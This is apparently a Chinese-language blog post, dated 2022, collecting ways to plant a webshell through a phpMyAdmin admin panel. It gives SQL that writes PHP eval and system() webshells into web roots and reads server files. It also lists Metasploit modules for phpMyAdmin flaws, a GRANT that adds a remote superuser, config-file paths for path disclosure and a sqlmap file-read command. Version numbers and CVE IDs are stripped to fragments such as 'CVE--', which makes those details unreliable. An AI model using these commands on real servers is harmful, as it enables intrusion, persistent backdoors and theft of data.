phpmyadmin后台拿shell方法总结

时间:2022-08-08 19:22:26
方法一:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/.php
一句话连接密码:xiaoma

方法二:
 Create TABLE xiaoma (xiaoma1 text NOT NULL);
 Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
 select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
 Drop TABLE IF EXISTS xiaoma;

方法三:

读取文件内容:    select load_file('E:/xamp/www/s.php');

写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'

cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

方法四:
 select load_file('E:/xamp/www/xiaoma.php');

 select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

 然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
phpmyadmin 漏洞总结 (-- ::)
一: 影响版本: < -rc3

    概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞

    利用模块:exploit/multi/http/phpmyadmin_preg_replace

    CVE: CVE--

    二: 影响版本:phpMyAdmin v3.

    概述:PhpMyAdmin存在server_sync.php 后门漏洞

    利用模块:exploit/multi/http/phpmyadmin_3522_backdoor

    CVE: CVE--

    三: 影响版本: .x < 3.1.3.1;

    概述:PhpMyAdmin配置文件/config/config.inc.php存在命令执行

    利用模块:exploit/unix/webapp/phpmyadmin_config

    CVE: CVE--

.  影响版本:phpmyadmin --phpmyadmin 2.11.4利用方式:直接在phpmyadmin的用户名内填入:  密码空
'localhost'@'@"
复制代码5. phpMyAdmin < .x Swekey远程代码注入攻击

. phpmyadmin 2.80 反序列 lfi、 rfi包含 漏洞文件 ss

phpmyadmin一句话开启外链mysql :添加超级用户guetsec密码ooxx并且允许外连 

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

phpmyadmin 暴绝对路径: 

. 用Web路径自动盲爆工具 V2. 乌云内测(带字典).rar

.扫phpinfo.php  info.php  php.php  test.php等等

. 上传图片 超长文件名!

.phpmyadmin构造xml上传暴路径

.phpmyadmin读取系统文件cmd爆路径!

.phpmyadmin读取 iis6,iis7配置文件  读取apache  Nginx 配置文件!

windows2003 iis6配置文件所在位置C:\Windows/system32\inetsrv\metabase.xml
win2008/ iis7. 在这个文件C:\Windows\System32\inetsrv\config\applicationHost.config
apache配置:/etc/httpd/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf 

Nginx配置  /etc/nginx/conf.d/vhost.conf
                /usr/local/etc/nginx/nginx.conf
穿山甲只能读一部分,  上sqlmap

sqlmap -u url --file-read 'C:\Windows\System32\inetsrv\config\applicationHost.config'